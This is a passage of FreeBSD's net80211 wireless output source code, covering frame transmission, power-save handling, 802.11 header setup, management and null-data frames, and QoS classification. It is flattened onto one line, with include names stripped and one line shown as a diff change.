DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ #include __FBSDID("$FreeBSD$"); #include "opt_inet.h" #include "opt_inet6.h" #include "opt_wlan.h" #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #ifdef IEEE80211_SUPPORT_SUPERG #include #endif #ifdef IEEE80211_SUPPORT_TDMA #include #endif #include #include #if defined(INET) || defined(INET6) #include #endif #ifdef INET #include #include #include #endif #ifdef INET6 #include #endif #include #define ETHER_HEADER_COPY(dst, src) \ memcpy(dst, src, sizeof(struct ether_header)) /* unalligned little endian access */ #define LE_WRITE_2(p, v) do { \ ((uint8_t *)(p))[0] = (v) & 0xff; \ ((uint8_t *)(p))[1] = ((v) >> 8) & 0xff; \ } while (0) #define LE_WRITE_4(p, v) do { \ ((uint8_t *)(p))[0] = (v) & 0xff; \ ((uint8_t *)(p))[1] = ((v) >> 8) & 0xff; \ ((uint8_t *)(p))[2] = ((v) >> 16) & 0xff; \ ((uint8_t *)(p))[3] = ((v) >> 24) & 0xff; \ } while (0) static int ieee80211_fragment(struct ieee80211vap *, struct mbuf *, u_int hdrsize, u_int ciphdrsize, u_int mtu); static void ieee80211_tx_mgt_cb(struct ieee80211_node *, void *, int); #ifdef IEEE80211_DEBUG /* * Decide if an outbound management frame should be * printed when debugging is enabled. This filters some * of the less interesting frames that come frequently * (e.g. beacons). */ static __inline int doprint(struct ieee80211vap *vap, int subtype) { switch (subtype) { case IEEE80211_FC0_SUBTYPE_PROBE_RESP: return (vap->iv_opmode == IEEE80211_M_IBSS); } return 1; } #endif /* * Transmit a frame to the given destination on the given VAP. * * It's up to the caller to figure out the details of who this * is going to and resolving the node. * * This routine takes care of queuing it for power save, * A-MPDU state stuff, fast-frames state stuff, encapsulation * if required, then passing it up to the driver layer. * * This routine (for now) consumes the mbuf and frees the node * reference; it ideally will return a TX status which reflects * whether the mbuf was consumed or not, so the caller can * free the mbuf (if appropriate) and the node reference (again, * if appropriate.) */ int ieee80211_vap_pkt_send_dest(struct ieee80211vap *vap, struct mbuf *m, struct ieee80211_node *ni) { struct ieee80211com *ic = vap->iv_ic; struct ifnet *ifp = vap->iv_ifp; int error; if ((ni->ni_flags & IEEE80211_NODE_PWR_MGT) && (m->m_flags & M_PWR_SAV) == 0) { /* * Station in power save mode; pass the frame * to the 802.11 layer and continue. We'll get * the frame back when the time is right. * XXX lose WDS vap linkage? */ (void) ieee80211_pwrsave(ni, m); ieee80211_free_node(ni); /* * We queued it fine, so tell the upper layer * that we consumed it. */ return (0); } /* calculate priority so drivers can find the tx queue */ if (ieee80211_classify(ni, m)) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_OUTPUT, ni->ni_macaddr, NULL, "%s", "classification failure"); vap->iv_stats.is_tx_classify++; ifp->if_oerrors++; m_freem(m); ieee80211_free_node(ni); /* XXX better status? */ return (0); } /* * Stash the node pointer. Note that we do this after * any call to ieee80211_dwds_mcast because that code * uses any existing value for rcvif to identify the * interface it (might have been) received on. */ m->m_pkthdr.rcvif = (void *)ni; BPF_MTAP(ifp, m); /* 802.3 tx */ /* * Check if A-MPDU tx aggregation is setup or if we * should try to enable it. The sta must be associated * with HT and A-MPDU enabled for use. When the policy * routine decides we should enable A-MPDU we issue an * ADDBA request and wait for a reply. The frame being * encapsulated will go out w/o using A-MPDU, or possibly * it might be collected by the driver and held/retransmit. * The default ic_ampdu_enable routine handles staggering * ADDBA requests in case the receiver NAK's us or we are * otherwise unable to establish a BA stream. */ if ((ni->ni_flags & IEEE80211_NODE_AMPDU_TX) && (vap->iv_flags_ht & IEEE80211_FHT_AMPDU_TX) && (m->m_flags & M_EAPOL) == 0) { int tid = WME_AC_TO_TID(M_WME_GETAC(m)); struct ieee80211_tx_ampdu *tap = &ni->ni_tx_ampdu[tid]; ieee80211_txampdu_count_packet(tap); if (IEEE80211_AMPDU_RUNNING(tap)) { /* * Operational, mark frame for aggregation. * * XXX do tx aggregation here */ m->m_flags |= M_AMPDU_MPDU; } else if (!IEEE80211_AMPDU_REQUESTED(tap) && ic->ic_ampdu_enable(ni, tap)) { /* * Not negotiated yet, request service. */ ieee80211_ampdu_request(ni, tap); /* XXX hold frame for reply? */ } } #ifdef IEEE80211_SUPPORT_SUPERG else if (IEEE80211_ATH_CAP(vap, ni, IEEE80211_NODE_FF)) { m = ieee80211_ff_check(ni, m); if (m == NULL) { /* NB: any ni ref held on stageq */ return (0); } } #endif /* IEEE80211_SUPPORT_SUPERG */ /* * Grab the TX lock - serialise the TX process from this * point (where TX state is being checked/modified) * through to driver queue. */ IEEE80211_TX_LOCK(ic); if (__predict_true((vap->iv_caps & IEEE80211_C_8023ENCAP) == 0)) { /* * Encapsulate the packet in prep for transmission. */ m = ieee80211_encap(vap, ni, m); if (m == NULL) { /* NB: stat+msg handled in ieee80211_encap */ IEEE80211_TX_UNLOCK(ic); ieee80211_free_node(ni); /* XXX better status? */ return (ENOBUFS); } } error = ieee80211_parent_xmitpkt(ic, m); /* * Unlock at this point - no need to hold it across * ieee80211_free_node() (ie, the comlock) */ IEEE80211_TX_UNLOCK(ic); if (error != 0) { /* NB: IFQ_HANDOFF reclaims mbuf */ ieee80211_free_node(ni); } else { ifp->if_opackets++; } ic->ic_lastdata = ticks; return (0); } /* * Send the given mbuf through the given vap. * * This consumes the mbuf regardless of whether the transmit * was successful or not. * * This does none of the initial checks that ieee80211_start() * does (eg CAC timeout, interface wakeup) - the caller must * do this first. */ static int ieee80211_start_pkt(struct ieee80211vap *vap, struct mbuf *m) { #define IS_DWDS(vap) \ (vap->iv_opmode == IEEE80211_M_WDS && \ (vap->iv_flags_ext & IEEE80211_FEXT_WDSLEGACY) == 0) struct ieee80211com *ic = vap->iv_ic; struct ifnet *ifp = vap->iv_ifp; struct ieee80211_node *ni; struct ether_header *eh; /* * Cancel any background scan. */ if (ic->ic_flags & IEEE80211_F_SCAN) ieee80211_cancel_anyscan(vap); /* * Find the node for the destination so we can do * things like power save and fast frames aggregation. * * NB: past this point various code assumes the first * mbuf has the 802.3 header present (and contiguous). */ ni = NULL; if (m->m_len < sizeof(struct ether_header) && (m = m_pullup(m, sizeof(struct ether_header))) == NULL) { IEEE80211_DPRINTF(vap, IEEE80211_MSG_OUTPUT, "discard frame, %s\n", "m_pullup failed"); vap->iv_stats.is_tx_nobuf++; /* XXX */ ifp->if_oerrors++; return (ENOBUFS); } eh = mtod(m, struct ether_header *); if (ETHER_IS_MULTICAST(eh->ether_dhost)) { if (IS_DWDS(vap)) { /* * Only unicast frames from the above go out * DWDS vaps; multicast frames are handled by * dispatching the frame as it comes through * the AP vap (see below). */ IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_WDS, eh->ether_dhost, "mcast", "%s", "on DWDS"); vap->iv_stats.is_dwds_mcast++; m_freem(m); /* XXX better status? */ return (ENOBUFS); } if (vap->iv_opmode == IEEE80211_M_HOSTAP) { /* * Spam DWDS vap's w/ multicast traffic. */ /* XXX only if dwds in use? */ ieee80211_dwds_mcast(vap, m); } } #ifdef IEEE80211_SUPPORT_MESH if (vap->iv_opmode != IEEE80211_M_MBSS) { #endif ni = ieee80211_find_txnode(vap, eh->ether_dhost); if (ni == NULL) { /* NB: ieee80211_find_txnode does stat+msg */ ifp->if_oerrors++; m_freem(m); /* XXX better status? */ return (ENOBUFS); } if (ni->ni_associd == 0 && (ni->ni_flags & IEEE80211_NODE_ASSOCID)) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_OUTPUT, eh->ether_dhost, NULL, "sta not associated (type 0x%04x)", htons(eh->ether_type)); vap->iv_stats.is_tx_notassoc++; ifp->if_oerrors++; m_freem(m); ieee80211_free_node(ni); /* XXX better status? */ return (ENOBUFS); } #ifdef IEEE80211_SUPPORT_MESH } else { if (!IEEE80211_ADDR_EQ(eh->ether_shost, vap->iv_myaddr)) { /* * Proxy station only if configured. */ if (!ieee80211_mesh_isproxyena(vap)) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_OUTPUT | IEEE80211_MSG_MESH, eh->ether_dhost, NULL, "%s", "proxy not enabled"); vap->iv_stats.is_mesh_notproxy++; ifp->if_oerrors++; m_freem(m); /* XXX better status? */ return (ENOBUFS); } IEEE80211_DPRINTF(vap, IEEE80211_MSG_OUTPUT, "forward frame from DS SA(%6D), DA(%6D)\n", eh->ether_shost, ":", eh->ether_dhost, ":"); ieee80211_mesh_proxy_check(vap, eh->ether_shost); } ni = ieee80211_mesh_discover(vap, eh->ether_dhost, m); if (ni == NULL) { /* * NB: ieee80211_mesh_discover holds/disposes * frame (e.g. queueing on path discovery). */ ifp->if_oerrors++; /* XXX better status? */ return (ENOBUFS); } } #endif /* * We've resolved the sender, so attempt to transmit it. */ if (ieee80211_vap_pkt_send_dest(vap, m, ni) != 0) return (ENOBUFS); return (0); #undef IS_DWDS } /* * Start method for vap's. All packets from the stack come * through here. We handle common processing of the packets * before dispatching them to the underlying device. * * if_transmit() requires that the mbuf be consumed by this call * regardless of the return condition. */ int ieee80211_vap_transmit(struct ifnet *ifp, struct mbuf *m) { struct ieee80211vap *vap = ifp->if_softc; struct ieee80211com *ic = vap->iv_ic; struct ifnet *parent = ic->ic_ifp; /* NB: parent must be up and running */ if (!IFNET_IS_UP_RUNNING(parent)) { IEEE80211_DPRINTF(vap, IEEE80211_MSG_OUTPUT, "%s: ignore queue, parent %s not up+running\n", __func__, parent->if_xname); /* XXX stat */ m_freem(m); return (EINVAL); } if (vap->iv_state == IEEE80211_S_SLEEP) { /* * In power save, wakeup device for transmit. */ ieee80211_new_state(vap, IEEE80211_S_RUN, 0); m_freem(m); return (0); } /* * No data frames go out unless we're running. * Note in particular this covers CAC and CSA * states (though maybe we should check muting * for CSA). */ if (vap->iv_state != IEEE80211_S_RUN) { IEEE80211_LOCK(ic); /* re-check under the com lock to avoid races */ if (vap->iv_state != IEEE80211_S_RUN) { IEEE80211_DPRINTF(vap, IEEE80211_MSG_OUTPUT, "%s: ignore queue, in %s state\n", __func__, ieee80211_state_name[vap->iv_state]); vap->iv_stats.is_tx_badstate++; IEEE80211_UNLOCK(ic); ifp->if_drv_flags |= IFF_DRV_OACTIVE; m_freem(m); return (EINVAL); } IEEE80211_UNLOCK(ic); } /* * Sanitize mbuf flags for net80211 use. We cannot * clear M_PWR_SAV or M_MORE_DATA because these may * be set for frames that are re-submitted from the * power save queue. * * NB: This must be done before ieee80211_classify as * it marks EAPOL in frames with M_EAPOL. */ m->m_flags &= ~(M_80211_TX - M_PWR_SAV - M_MORE_DATA); /* * Bump to the packet transmission path. * The mbuf will be consumed here. */ return (ieee80211_start_pkt(vap, m)); } void ieee80211_vap_qflush(struct ifnet *ifp) { /* Empty for now */ } /* * 802.11 raw output routine. */ int ieee80211_raw_output(struct ieee80211vap *vap, struct ieee80211_node *ni, struct mbuf *m, const struct ieee80211_bpf_params *params) { struct ieee80211com *ic = vap->iv_ic; return (ic->ic_raw_xmit(ni, m, params)); } /* * 802.11 output routine. This is (currently) used only to * connect bpf write calls to the 802.11 layer for injecting * raw 802.11 frames. */ #if __FreeBSD_version >= 1000031 int ieee80211_output(struct ifnet *ifp, struct mbuf *m, const struct sockaddr *dst, struct route *ro) #else int ieee80211_output(struct ifnet *ifp, struct mbuf *m, struct sockaddr *dst, struct route *ro) #endif { #define senderr(e) do { error = (e); goto bad;} while (0) struct ieee80211_node *ni = NULL; struct ieee80211vap *vap; struct ieee80211_frame *wh; struct ieee80211com *ic = NULL; int error; int ret; if (ifp->if_drv_flags & IFF_DRV_OACTIVE) { /* * Short-circuit requests if the vap is marked OACTIVE * as this can happen because a packet came down through * ieee80211_start before the vap entered RUN state in * which case it's ok to just drop the frame. This * should not be necessary but callers of if_output don't * check OACTIVE. */ senderr(ENETDOWN); } vap = ifp->if_softc; ic = vap->iv_ic; /* * Hand to the 802.3 code if not tagged as * a raw 802.11 frame. */ if (dst->sa_family != AF_IEEE80211) return vap->iv_output(ifp, m, dst, ro); #ifdef MAC error = mac_ifnet_check_transmit(ifp, m); if (error) senderr(error); #endif if (ifp->if_flags & IFF_MONITOR) senderr(ENETDOWN); if (!IFNET_IS_UP_RUNNING(ifp)) senderr(ENETDOWN); if (vap->iv_state == IEEE80211_S_CAC) { IEEE80211_DPRINTF(vap, IEEE80211_MSG_OUTPUT | IEEE80211_MSG_DOTH, "block %s frame in CAC state\n", "raw data"); vap->iv_stats.is_tx_badstate++; senderr(EIO); /* XXX */ } else if (vap->iv_state == IEEE80211_S_SCAN) senderr(EIO); /* XXX bypass bridge, pfil, carp, etc. */ if (m->m_pkthdr.len < sizeof(struct ieee80211_frame_ack)) senderr(EIO); /* XXX */ wh = mtod(m, struct ieee80211_frame *); if ((wh->i_fc[0] & IEEE80211_FC0_VERSION_MASK) != IEEE80211_FC0_VERSION_0) senderr(EIO); /* XXX */ /* locate destination node */ switch (wh->i_fc[1] & IEEE80211_FC1_DIR_MASK) { case IEEE80211_FC1_DIR_NODS: case IEEE80211_FC1_DIR_FROMDS: ni = ieee80211_find_txnode(vap, wh->i_addr1); break; case IEEE80211_FC1_DIR_TODS: case IEEE80211_FC1_DIR_DSTODS: if (m->m_pkthdr.len < sizeof(struct ieee80211_frame)) senderr(EIO); /* XXX */ ni = ieee80211_find_txnode(vap, wh->i_addr3); break; default: senderr(EIO); /* XXX */ } if (ni == NULL) { /* * Permit packets w/ bpf params through regardless * (see below about sa_len). */ if (dst->sa_len == 0) senderr(EHOSTUNREACH); ni = ieee80211_ref_node(vap->iv_bss); } /* * Sanitize mbuf for net80211 flags leaked from above. * * NB: This must be done before ieee80211_classify as * it marks EAPOL in frames with M_EAPOL. */ m->m_flags &= ~M_80211_TX; /* calculate priority so drivers can find the tx queue */ /* XXX assumes an 802.3 frame */ if (ieee80211_classify(ni, m)) senderr(EIO); /* XXX */ ifp->if_opackets++; IEEE80211_NODE_STAT(ni, tx_data); if (IEEE80211_IS_MULTICAST(wh->i_addr1)) { IEEE80211_NODE_STAT(ni, tx_mcast); m->m_flags |= M_MCAST; } else IEEE80211_NODE_STAT(ni, tx_ucast); /* NB: ieee80211_encap does not include 802.11 header */ IEEE80211_NODE_STAT_ADD(ni, tx_bytes, m->m_pkthdr.len); IEEE80211_TX_LOCK(ic); /* * NB: DLT_IEEE802_11_RADIO identifies the parameters are * present by setting the sa_len field of the sockaddr (yes, * this is a hack). * NB: we assume sa_data is suitably aligned to cast. */ ret = ieee80211_raw_output(vap, ni, m, (const struct ieee80211_bpf_params *)(dst->sa_len ? dst->sa_data : NULL)); IEEE80211_TX_UNLOCK(ic); return (ret); bad: if (m != NULL) m_freem(m); if (ni != NULL) ieee80211_free_node(ni); ifp->if_oerrors++; return error; #undef senderr } /* * Set the direction field and address fields of an outgoing * frame. Note this should be called early on in constructing * a frame as it sets i_fc[1]; other bits can then be or'd in. */ void ieee80211_send_setup( struct ieee80211_node *ni, struct mbuf *m, int type, int tid, const uint8_t sa[IEEE80211_ADDR_LEN], const uint8_t da[IEEE80211_ADDR_LEN], const uint8_t bssid[IEEE80211_ADDR_LEN]) { #define WH4(wh) ((struct ieee80211_frame_addr4 *)wh) struct ieee80211vap *vap = ni->ni_vap; struct ieee80211_tx_ampdu *tap; struct ieee80211_frame *wh = mtod(m, struct ieee80211_frame *); ieee80211_seq seqno; IEEE80211_TX_LOCK_ASSERT(ni->ni_ic); wh->i_fc[0] = IEEE80211_FC0_VERSION_0 | type; if ((type & IEEE80211_FC0_TYPE_MASK) == IEEE80211_FC0_TYPE_DATA) { switch (vap->iv_opmode) { case IEEE80211_M_STA: wh->i_fc[1] = IEEE80211_FC1_DIR_TODS; IEEE80211_ADDR_COPY(wh->i_addr1, bssid); IEEE80211_ADDR_COPY(wh->i_addr2, sa); IEEE80211_ADDR_COPY(wh->i_addr3, da); break; case IEEE80211_M_IBSS: case IEEE80211_M_AHDEMO: wh->i_fc[1] = IEEE80211_FC1_DIR_NODS; IEEE80211_ADDR_COPY(wh->i_addr1, da); IEEE80211_ADDR_COPY(wh->i_addr2, sa); IEEE80211_ADDR_COPY(wh->i_addr3, bssid); break; case IEEE80211_M_HOSTAP: wh->i_fc[1] = IEEE80211_FC1_DIR_FROMDS; IEEE80211_ADDR_COPY(wh->i_addr1, da); IEEE80211_ADDR_COPY(wh->i_addr2, bssid); IEEE80211_ADDR_COPY(wh->i_addr3, sa); break; case IEEE80211_M_WDS: wh->i_fc[1] = IEEE80211_FC1_DIR_DSTODS; IEEE80211_ADDR_COPY(wh->i_addr1, da); IEEE80211_ADDR_COPY(wh->i_addr2, vap->iv_myaddr); IEEE80211_ADDR_COPY(wh->i_addr3, da); IEEE80211_ADDR_COPY(WH4(wh)->i_addr4, sa); break; case IEEE80211_M_MBSS: #ifdef IEEE80211_SUPPORT_MESH if (IEEE80211_IS_MULTICAST(da)) { wh->i_fc[1] = IEEE80211_FC1_DIR_FROMDS; /* XXX next hop */ IEEE80211_ADDR_COPY(wh->i_addr1, da); IEEE80211_ADDR_COPY(wh->i_addr2, vap->iv_myaddr); } else { wh->i_fc[1] = IEEE80211_FC1_DIR_DSTODS; IEEE80211_ADDR_COPY(wh->i_addr1, da); IEEE80211_ADDR_COPY(wh->i_addr2, vap->iv_myaddr); IEEE80211_ADDR_COPY(wh->i_addr3, da); IEEE80211_ADDR_COPY(WH4(wh)->i_addr4, sa); } #endif break; case IEEE80211_M_MONITOR: /* NB: to quiet compiler */ break; } } else { wh->i_fc[1] = IEEE80211_FC1_DIR_NODS; IEEE80211_ADDR_COPY(wh->i_addr1, da); IEEE80211_ADDR_COPY(wh->i_addr2, sa); #ifdef IEEE80211_SUPPORT_MESH if (vap->iv_opmode == IEEE80211_M_MBSS) IEEE80211_ADDR_COPY(wh->i_addr3, sa); else #endif IEEE80211_ADDR_COPY(wh->i_addr3, bssid); } *(uint16_t *)&wh->i_dur[0] = 0; tap = &ni->ni_tx_ampdu[tid]; if (tid != IEEE80211_NONQOS_TID && IEEE80211_AMPDU_RUNNING(tap)) m->m_flags |= M_AMPDU_MPDU; else { seqno = ni->ni_txseqs[tid]++; *(uint16_t *)&wh->i_seq[0] = htole16(seqno << IEEE80211_SEQ_SEQ_SHIFT); M_SEQNO_SET(m, seqno); } if (IEEE80211_IS_MULTICAST(wh->i_addr1)) m->m_flags |= M_MCAST; #undef WH4 } /* * Send a management frame to the specified node. The node pointer * must have a reference as the pointer will be passed to the driver * and potentially held for a long time. If the frame is successfully * dispatched to the driver, then it is responsible for freeing the * reference (and potentially free'ing up any associated storage); * otherwise deal with reclaiming any reference (on error). */ int ieee80211_mgmt_output(struct ieee80211_node *ni, struct mbuf *m, int type, struct ieee80211_bpf_params *params) { struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; struct ieee80211_frame *wh; int ret; KASSERT(ni != NULL, ("null node")); if (vap->iv_state == IEEE80211_S_CAC) { IEEE80211_NOTE(vap, IEEE80211_MSG_OUTPUT | IEEE80211_MSG_DOTH, ni, "block %s frame in CAC state", ieee80211_mgt_subtype_name[ (type & IEEE80211_FC0_SUBTYPE_MASK) >> IEEE80211_FC0_SUBTYPE_SHIFT]); vap->iv_stats.is_tx_badstate++; ieee80211_free_node(ni); m_freem(m); return EIO; /* XXX */ } M_PREPEND(m, sizeof(struct ieee80211_frame), M_NOWAIT); if (m == NULL) { ieee80211_free_node(ni); return ENOMEM; } IEEE80211_TX_LOCK(ic); wh = mtod(m, struct ieee80211_frame *); ieee80211_send_setup(ni, m, IEEE80211_FC0_TYPE_MGT | type, IEEE80211_NONQOS_TID, vap->iv_myaddr, ni->ni_macaddr, ni->ni_bssid); if (params->ibp_flags & IEEE80211_BPF_CRYPTO) { IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_AUTH, wh->i_addr1, "encrypting frame (%s)", __func__); - wh->i_fc[1] |= IEEE80211_FC1_WEP; + wh->i_fc[1] |= IEEE80211_FC1_PROTECTED; } m->m_flags |= M_ENCAP; /* mark encapsulated */ KASSERT(type != IEEE80211_FC0_SUBTYPE_PROBE_RESP, ("probe response?")); M_WME_SETAC(m, params->ibp_pri); #ifdef IEEE80211_DEBUG /* avoid printing too many frames */ if ((ieee80211_msg_debug(vap) && doprint(vap, type)) || ieee80211_msg_dumppkts(vap)) { printf("[%s] send %s on channel %u\n", ether_sprintf(wh->i_addr1), ieee80211_mgt_subtype_name[ (type & IEEE80211_FC0_SUBTYPE_MASK) >> IEEE80211_FC0_SUBTYPE_SHIFT], ieee80211_chan2ieee(ic, ic->ic_curchan)); } #endif IEEE80211_NODE_STAT(ni, tx_mgmt); ret = ieee80211_raw_output(vap, ni, m, params); IEEE80211_TX_UNLOCK(ic); return (ret); } /* * Send a null data frame to the specified node. If the station * is setup for QoS then a QoS Null Data frame is constructed. * If this is a WDS station then a 4-address frame is constructed. * * NB: the caller is assumed to have setup a node reference * for use; this is necessary to deal with a race condition * when probing for inactive stations. Like ieee80211_mgmt_output * we must cleanup any node reference on error; however we * can safely just unref it as we know it will never be the * last reference to the node. */ int ieee80211_send_nulldata(struct ieee80211_node *ni) { struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; struct mbuf *m; struct ieee80211_frame *wh; int hdrlen; uint8_t *frm; int ret; if (vap->iv_state == IEEE80211_S_CAC) { IEEE80211_NOTE(vap, IEEE80211_MSG_OUTPUT | IEEE80211_MSG_DOTH, ni, "block %s frame in CAC state", "null data"); ieee80211_unref_node(&ni); vap->iv_stats.is_tx_badstate++; return EIO; /* XXX */ } if (ni->ni_flags & (IEEE80211_NODE_QOS|IEEE80211_NODE_HT)) hdrlen = sizeof(struct ieee80211_qosframe); else hdrlen = sizeof(struct ieee80211_frame); /* NB: only WDS vap's get 4-address frames */ if (vap->iv_opmode == IEEE80211_M_WDS) hdrlen += IEEE80211_ADDR_LEN; if (ic->ic_flags & IEEE80211_F_DATAPAD) hdrlen = roundup(hdrlen, sizeof(uint32_t)); m = ieee80211_getmgtframe(&frm, ic->ic_headroom + hdrlen, 0); if (m == NULL) { /* XXX debug msg */ ieee80211_unref_node(&ni); vap->iv_stats.is_tx_nobuf++; return ENOMEM; } KASSERT(M_LEADINGSPACE(m) >= hdrlen, ("leading space %zd", M_LEADINGSPACE(m))); M_PREPEND(m, hdrlen, M_NOWAIT); if (m == NULL) { /* NB: cannot happen */ ieee80211_free_node(ni); return ENOMEM; } IEEE80211_TX_LOCK(ic); wh = mtod(m, struct ieee80211_frame *); /* NB: a little lie */ if (ni->ni_flags & IEEE80211_NODE_QOS) { const int tid = WME_AC_TO_TID(WME_AC_BE); uint8_t *qos; ieee80211_send_setup(ni, m, IEEE80211_FC0_TYPE_DATA | IEEE80211_FC0_SUBTYPE_QOS_NULL, tid, vap->iv_myaddr, ni->ni_macaddr, ni->ni_bssid); if (vap->iv_opmode == IEEE80211_M_WDS) qos = ((struct ieee80211_qosframe_addr4 *) wh)->i_qos; else qos = ((struct ieee80211_qosframe *) wh)->i_qos; qos[0] = tid & IEEE80211_QOS_TID; if (ic->ic_wme.wme_wmeChanParams.cap_wmeParams[WME_AC_BE].wmep_noackPolicy) qos[0] |= IEEE80211_QOS_ACKPOLICY_NOACK; qos[1] = 0; } else { ieee80211_send_setup(ni, m, IEEE80211_FC0_TYPE_DATA | IEEE80211_FC0_SUBTYPE_NODATA, IEEE80211_NONQOS_TID, vap->iv_myaddr, ni->ni_macaddr, ni->ni_bssid); } if (vap->iv_opmode != IEEE80211_M_WDS) { /* NB: power management bit is never sent by an AP */ if ((ni->ni_flags & IEEE80211_NODE_PWR_MGT) && vap->iv_opmode != IEEE80211_M_HOSTAP) wh->i_fc[1] |= IEEE80211_FC1_PWR_MGT; } m->m_len = m->m_pkthdr.len = hdrlen; m->m_flags |= M_ENCAP; /* mark encapsulated */ M_WME_SETAC(m, WME_AC_BE); IEEE80211_NODE_STAT(ni, tx_data); IEEE80211_NOTE(vap, IEEE80211_MSG_DEBUG | IEEE80211_MSG_DUMPPKTS, ni, "send %snull data frame on channel %u, pwr mgt %s", ni->ni_flags & IEEE80211_NODE_QOS ? "QoS " : "", ieee80211_chan2ieee(ic, ic->ic_curchan), wh->i_fc[1] & IEEE80211_FC1_PWR_MGT ? "ena" : "dis"); ret = ieee80211_raw_output(vap, ni, m, NULL); IEEE80211_TX_UNLOCK(ic); return (ret); } /* * Assign priority to a frame based on any vlan tag assigned * to the station and/or any Diffserv setting in an IP header. * Finally, if an ACM policy is setup (in station mode) it's * applied. */ int ieee80211_classify(struct ieee80211_node *ni, struct mbuf *m) { const struct ether_header *eh = mtod(m, struct ether_header *); int v_wme_ac, d_wme_ac, ac; /* * Always promote PAE/EAPOL frames to high priority. */ if (eh->ether_type == htons(ETHERTYPE_PAE)) { /* NB: mark so others don't need to check header */ m->m_flags |= M_EAPOL; ac = WME_AC_VO; goto done; } /* * Non-qos traffic goes to BE. */ if ((ni->ni_flags & IEEE80211_NODE_QOS) == 0) { ac = WME_AC_BE; goto done; } /* * If node has a vlan tag then all traffic * to it must have a matching tag. */ v_wme_ac = 0; if (ni->ni_vlan != 0) { if ((m->m_flags & M_VLANTAG) == 0) { IEEE80211_NODE_STAT(ni, tx_novlantag); return 1; } if (EVL_VLANOFTAG(m->m_pkthdr.ether_vtag) != EVL_VLANOFTAG(ni->ni_vlan)) { IEEE80211_NODE_STAT(ni, tx_vlanmismatch); return 1; } /* map vlan priority to AC */ v_wme_ac = TID_TO_WME_AC(EVL_PRIOFTAG(ni->ni_vlan)); } /* XXX m_copydata may be too slow for fast path */ #ifdef INET if (eh->ether_type == htons(ETHERTYPE_IP)) { uint8_t tos; /* * IP frame, map the DSCP bits from the TOS field. */ /* NB: ip header may not be in first mbuf */ m_copydata(m, sizeof(struct ether_header) + offsetof(struct ip, ip_tos), sizeof(tos), &tos); tos >>= 5; /* NB: ECN + low 3 bits of DSCP */ d_wme_ac = TID_TO_WME_AC(tos); } else { #endif /* INET */ #ifdef INET6 if (eh->ether_type == htons(ETHERTYPE_IPV6)) { uint32_t flow; uint8_t tos; /* * IPv6 frame, map the DSCP bits from the traffic class field. */ m_copydata(m, sizeof(struct ether_header) + offsetof(struct ip6_hdr, ip6_flow), sizeof(flow), (caddr_t) &flow); tos = (uint8_t)(ntohl(flow) >> 20); tos >>= 5; /* NB: ECN + low 3 bits of DSCP */ d_wme_ac = TID_TO_WME_AC(tos); } else { #endif /* INET6 */ d_wme_ac = WME_AC_BE; #ifdef INET6 } #endif #ifdef INET } #endif /* * Use highest priority AC. */ if (v_wme_ac > d_wme_ac) ac = v_wme_ac; else ac = d_wme_ac; /* * Apply ACM policy. */ if (ni->ni_vap->iv_opmode == IEEE80211_M_STA) { static const int acmap[4] = { WME_AC_BK, /* WME_AC_BE */ WME_AC_BK, /* WME_AC_BK */ WME_AC_BE, /* WME_AC_VI */ WME_AC_VI, /* WME_AC_VO */ }; struct ieee80211com *ic = ni->ni_ic; while (ac != WME_AC_BK && ic->ic_wme.wme_wmeBssChanParams.cap_wmeParams[ac].wmep_acm) ac = acmap[ac]; } done: M_WME_SETAC(m, ac); return 0; } /* * Insure there is sufficient contiguous space to encapsulate the * 802.11 data frame. If room isn't already there, arrange for it. * Drivers and cipher modules assume we have done the necessary work * and fail rudely if they don't find the space they need. */ struct mbuf * ieee80211_mbuf_adjust(struct ieee80211vap *vap, int hdrsize, struct ieee80211_key *key, struct mbuf *m) { #define TO_BE_RECLAIMED (sizeof(struct ether_header) - sizeof(struct llc)) int needed_space = vap->iv_ic->ic_headroom + hdrsize; if (key != NULL) { /* XXX belongs in crypto code? */ needed_space += key->wk_cipher->ic_header; /* XXX frags */ /* * When crypto is being done in the host we must insure * the data are writable for the cipher routines; clone * a writable mbuf chain. * XXX handle SWMIC specially */ if (key->wk_flags & (IEEE80211_KEY_SWENCRYPT|IEEE80211_KEY_SWENMIC)) { m = m_unshare(m, M_NOWAIT); if (m == NULL) { IEEE80211_DPRINTF(vap, IEEE80211_MSG_OUTPUT, "%s: cannot get writable mbuf\n", __func__); vap->iv_stats.is_tx_nobuf++; /* XXX new stat */ return NULL; } } } /* * We know we are called just before stripping an Ethernet * header and prepending an LLC header. This means we know * there will be * sizeof(struct ether_header) - sizeof(struct llc) * bytes recovered to which we need additional space for the * 802.11 header and any crypto header. */ /* XXX check trailing space and copy instead? */ if (M_LEADINGSPACE(m) < needed_space - TO_BE_RECLAIMED) { struct mbuf *n = m_gethdr(M_NOWAIT, m->m_type); if (n == NULL) { IEEE80211_DPRINTF(vap, IEEE80211_MSG_OUTPUT, "%s: cannot expand storage\n", __func__); vap->iv_stats.is_tx_nobuf++; m_freem(m); return NULL; } KASSERT(needed_space <= MHLEN, ("not enough room, need %u got %d\n", needed_space, MHLEN)); /* * Setup new mbuf to have leading space to prepend the * 802.11 header and any crypto header bits that are * required (the latter are added when the driver calls * back to ieee80211_crypto_encap to do crypto encapsulation). */ /* NB: must be first 'cuz it clobbers m_data */ m_move_pkthdr(n, m); n->m_len = 0; /* NB: m_gethdr does not set */ n->m_data += needed_space; /* * Pull up Ethernet header to create the expected layout. * We could use m_pullup but that's overkill (i.e. we don't * need the actual data) and it cannot fail so do it inline * for speed. */ /* NB: struct ether_header is known to be contiguous */ n->m_len += sizeof(struct ether_header); m->m_len -= sizeof(struct ether_header); m->m_data += sizeof(struct ether_header); /* * Replace the head of the chain. */ n->m_next = m; m = n; } return m; #undef TO_BE_RECLAIMED } /* * Return the transmit key to use in 